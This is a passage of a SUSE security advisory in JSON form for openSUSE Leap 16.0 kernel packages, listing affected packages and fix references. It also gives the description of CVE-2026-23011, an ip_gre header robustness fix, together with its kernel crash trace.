"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-23006"
},
{
"cve": "CVE-2026-23011",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23011"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: ip_gre: make ipgre_header() robust\n\nAnalog to commit db5b4e39c4e6 (\"ip6_gre: make ip6gre_header() robust\")\n\nOver the years, syzbot found many ways to crash the kernel\nin ipgre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ipgre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff89ea3cb7 len:2030915468 put:2030915372 head:ffff888058b43000 data:ffff887fdfa6e194 tail:0x120 end:0x6c0 dev:team0\n kernel BUG at net/core/skbuff.c:213 !\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 1 UID: 0 PID: 1322 Comm: kworker/1:9 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nWorkqueue: mld mld_ifc_work\n RIP: 0010:skb_panic+0x157/0x160 net/core/skbuff.c:213\nCall Trace:\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ipgre_header+0x67/0x290 net/ipv4/ip_gre.c:897\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23011",
"url": "https://www.suse.com/security/cve/CVE-2026-23011"
},
{
"category": "external",
"summary": "SUSE Bug 1257207 for CVE-2026-23011",
"url": "https://bugzilla.suse.com/1257207"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
